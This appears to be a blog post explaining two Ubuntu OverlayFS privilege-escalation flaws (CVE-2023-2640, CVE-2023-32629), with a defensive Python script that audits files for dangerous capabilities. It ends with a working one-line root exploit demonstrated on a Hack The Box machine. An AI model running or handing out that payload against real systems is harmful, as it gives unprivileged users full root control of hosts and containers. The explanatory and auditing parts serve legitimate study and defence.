Ubuntu GameOver(lay) Local Privilege Escalation

Sep 11, 2023

Introduction:

Two privilege escalation vulnerabilities, namely CVE-2023-2640 and CVE-2023-32629, have been identified in the Ubuntu kernel OverlayFS module. These vulnerabilities not only affect Ubuntu hosts running vulnerable kernel versions but also impact any containers running on those hosts.

Background: Understanding OverlayFS

OverlayFS is a union mount filesystem that combines two directory trees, with one tree typically being read-write and overlaid on top of another read-only tree. In OverlayFS, any modifications are made to the upper writable layer, while the lower layer remains read-only.

In the context of containers and Kubernetes, OverlayFS plays a crucial role as one of the fundamental building blocks. The lower layer represents the read-only image or base layer, while the upper layer is the container layer that can be modified.

Because the kernel mediates every file interaction between the lower and upper layers, OverlayFS is an attractive target for exploitation, and several vulnerabilities in it have been discovered in the past. If you want to study OverlayFS in depth, see https://www.grant.pizza/blog/overlayfs/.

Major Impact:

Both of these vulnerabilities allow for local privilege escalation, enabling an unprivileged user to gain elevated privileges on the system. This poses a significant threat as it grants attackers with basic access the ability to escalate their privileges to root level, thereby gaining complete control over the compromised system.

How it Works:

CVE-2023-2640 and CVE-2023-32629 share a common core issue: when OverlayFS copies a file from the lower directory up to the upper directory, it preserves the file's extended attributes, including the security.capability attribute in which Linux stores file capabilities. Consequently, if a file in the lower directory carries capabilities such as CAP_SYS_ADMIN or CAP_SETUID, those capabilities are retained on the copy in the upper layer. A non-root user can then simply execute the file in the upper layer to acquire root privileges.
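The defender's counterpart to the mechanism described above is an inventory of which files on a host (or in a container's upper layer) actually carry file capabilities, and which of those would hand root to whoever executes them. The script below is an added example, not part of the original post: it decodes the raw security.capability extended attribute (struct vfs_cap_data, revisions 1 to 3, as documented in capabilities(7)) and flags capability sets that are both dangerous and honoured by the initial user namespace. The DANGEROUS set, the sample byte strings and the report format are this example's own choices; the byte strings are constructed here to match what setcap cap_setuid+eip writes and are not taken from the page.

```python
"""Audit a directory tree for files carrying Linux file capabilities.

Decodes the raw ``security.capability`` xattr (struct vfs_cap_data) and flags
capabilities that let an ordinary user become root by executing the binary.
"""
import errno
import os
import struct
from typing import Dict, Iterator, Optional, Set, Tuple

# Capability numbers (bit positions) from <linux/capability.h>.
CAP_NAMES = [
    "cap_chown", "cap_dac_override", "cap_dac_read_search", "cap_fowner",
    "cap_fsetid", "cap_kill", "cap_setgid", "cap_setuid", "cap_setpcap",
    "cap_linux_immutable", "cap_net_bind_service", "cap_net_broadcast",
    "cap_net_admin", "cap_net_raw", "cap_ipc_lock", "cap_ipc_owner",
    "cap_sys_module", "cap_sys_rawio", "cap_sys_chroot", "cap_sys_ptrace",
    "cap_sys_pacct", "cap_sys_admin", "cap_sys_boot", "cap_sys_nice",
    "cap_sys_resource", "cap_sys_time", "cap_sys_tty_config", "cap_mknod",
    "cap_lease", "cap_audit_write", "cap_audit_control", "cap_setfcap",
    "cap_mac_override", "cap_mac_admin", "cap_syslog", "cap_wake_alarm",
    "cap_block_suspend", "cap_audit_read", "cap_perfmon", "cap_bpf",
    "cap_checkpoint_restore",
]

# Example policy (this script's own choice): capabilities that on their own are
# enough for an unprivileged user to reach root when the file is executed.
DANGEROUS = {"cap_setuid", "cap_setgid", "cap_sys_admin", "cap_dac_override",
             "cap_sys_ptrace", "cap_sys_module", "cap_setfcap", "cap_fowner"}

VFS_CAP_REVISION_MASK = 0xFF000000
VFS_CAP_FLAGS_EFFECTIVE = 0x00000001


def _bits_to_names(lo: int, hi: int) -> Set[str]:
    """Turn the two 32-bit words of a capability set into capability names."""
    mask = lo | (hi << 32)
    return {name for i, name in enumerate(CAP_NAMES) if mask >> i & 1}


def decode_vfs_cap(raw: bytes) -> Dict[str, object]:
    """Decode a security.capability value.

    Revision 1: 12 bytes, one 32-bit word per set.
    Revision 2: 20 bytes, two words per set (permitted, inheritable) x 2.
    Revision 3: 24 bytes, revision 2 plus a rootid; the capability is only
    honoured in user namespaces whose root maps to that uid (rootid 0 means
    the initial namespace, i.e. real root).
    """
    if len(raw) < 4:
        raise ValueError("security.capability value too short")
    (magic,) = struct.unpack_from("<I", raw, 0)
    revision = (magic & VFS_CAP_REVISION_MASK) >> 24
    effective = bool(magic & VFS_CAP_FLAGS_EFFECTIVE)
    rootid: Optional[int] = None
    if revision == 1 and len(raw) == 12:
        perm_lo, inh_lo = struct.unpack_from("<II", raw, 4)
        perm_hi = inh_hi = 0
    elif revision == 2 and len(raw) == 20:
        perm_lo, inh_lo, perm_hi, inh_hi = struct.unpack_from("<IIII", raw, 4)
    elif revision == 3 and len(raw) == 24:
        perm_lo, inh_lo, perm_hi, inh_hi, rootid = struct.unpack_from("<IIIII", raw, 4)
    else:
        raise ValueError(f"unsupported vfs_cap_data revision {revision}, length {len(raw)}")
    return {"revision": revision, "effective": effective, "rootid": rootid,
            "permitted": _bits_to_names(perm_lo, perm_hi),
            "inheritable": _bits_to_names(inh_lo, inh_hi)}


def dangerous_caps(caps: Dict[str, object]) -> Set[str]:
    """Dangerous permitted capabilities that the initial user namespace would honour.

    A revision-3 value with a non-zero rootid is scoped to a user namespace and
    is not honoured by the host's init namespace, so it is not flagged here.
    """
    if caps["rootid"] not in (None, 0):
        return set()
    return set(caps["permitted"]) & DANGEROUS


def scan_tree(root: str) -> Iterator[Tuple[str, Dict[str, object]]]:
    """Yield (path, decoded caps) for every file under root that has a file capability."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                raw = os.getxattr(path, "security.capability", follow_symlinks=False)
            except OSError as exc:  # no xattr, unsupported fs, vanished or unreadable file
                if exc.errno in (errno.ENODATA, errno.ENOTSUP, errno.ENOENT, errno.EACCES):
                    continue
                raise
            yield path, decode_vfs_cap(raw)


# Constructed sample values (not captured from any host): what
# `setcap cap_setuid+eip` writes in the initial namespace (revision 2) and
# the revision-3 form scoped to a user namespace whose root maps to uid 1000.
SETUID_EIP_V2 = struct.pack("<IIIII", 0x02000001, 1 << 7, 1 << 7, 0, 0)
SETUID_EIP_V3_USERNS = struct.pack("<IIIIII", 0x03000001, 1 << 7, 1 << 7, 0, 0, 1000)

if __name__ == "__main__":
    import sys
    for path, caps in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "/"):
        flag = "DANGEROUS" if dangerous_caps(caps) else ("ns-scoped" if caps["rootid"] else "ok")
        print(f"{flag:9} {path} permitted={sorted(caps['permitted'])} rootid={caps['rootid']}")
```

Run it against / on a host, or against an overlay upper directory on a container host, and compare the DANGEROUS lines with the capability-bearing binaries the distribution legitimately ships (ping and a few others); anything in a container's upper layer or under a user's home directory is worth a closer look.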

POC:

Payload

I have used the Hack The Box machine "Analytics" for a practical demonstration of the Ubuntu GameOver(Lay) vulnerability.

User "metalytics" is an unprivileged user. Executing the following payload will switch the user to "root".

unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'